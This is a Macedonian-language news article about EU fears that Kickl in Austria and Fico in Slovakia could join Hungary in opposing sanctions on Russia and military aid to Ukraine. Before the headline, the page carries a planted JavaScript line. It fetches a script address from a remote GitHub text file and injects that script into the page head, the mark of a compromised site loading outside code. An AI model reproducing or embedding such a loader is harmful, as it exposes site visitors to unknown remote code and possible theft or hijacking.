;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ЕУ се плаши од „проруски“ лидери во клучните држави - Антропол
АктуелноИнтернационално

ЕУ се плаши од „проруски“ лидери во клучните држави

Доколку Кикл во Австрија и Фицо во Словачка ги преземат функцијите, заедно со Унгарија ќе формираат моќен политички блок и би можеле да извршат значителен притисок врз Брисел да ја промени својата политика за Украина.

„Би било катастрофа“ доколку во Австрија и Словачка се изберат лидери кои се скептични за Украина, изјави претставник на Европската комисија за Политико. ЕУ, наводно, стравува дека политичките промени во двете земји би можеле да ги загрозат идните санкции против Русија, како и воената помош на блокот за Киев.

Австриската централнодесничарска влада е непопуларна, а загриженоста за имиграцијата и зголемените трошоци за живот ја направија десничарската Партија на слободата на Херберт Кикл најпопуларна политичка фракција од крајот на минатата година. Законодавните избори се закажани најдоцна за следната есен.

Исто така во Словачка има пораст на популарноста на поранешниот премиер Роберт Фицо. На само три месеци до парламентарните избори, партијата на Фицо води во анкетите.

Некои медиуми во Европа последниве денови почнаа со написи во кои го опишува австрискиот политичар како „проруски, антиамерикански теоретичар на заговор“, а неговиот словачки колега како ширител на „руски дезинформации“.

И двајцата потенцијални премиери се жестоки противници на имиграцијата, особено од исламските земји. Кога станува збор за Украина, Кикл го прогласи НАТО за одговорен за конфликтот како Русија и смета дека поддршката на Австрија на санкциите на ЕУ кон Москва е кршење на неутралноста на земјата. Во март оваа година, Кикл и неговите колеги од Партијата на слободата го напуштија парламентот за време на обраќањето на украинскиот претседател Владимир Зеленски.

Словачка е членка на НАТО и ѝ даде на Украина оклопни транспортери, хаубици и целата нејзина флота борбени авиони МиГ-29 од советската ера. Фицо, кој беше два мандата како премиер во последните две децении, рече дека ќе ја прекине оваа воена помош.

Досега Унгарија беше единствената членка на ЕУ која постојано се спротивставуваше на санкциите кон Русија.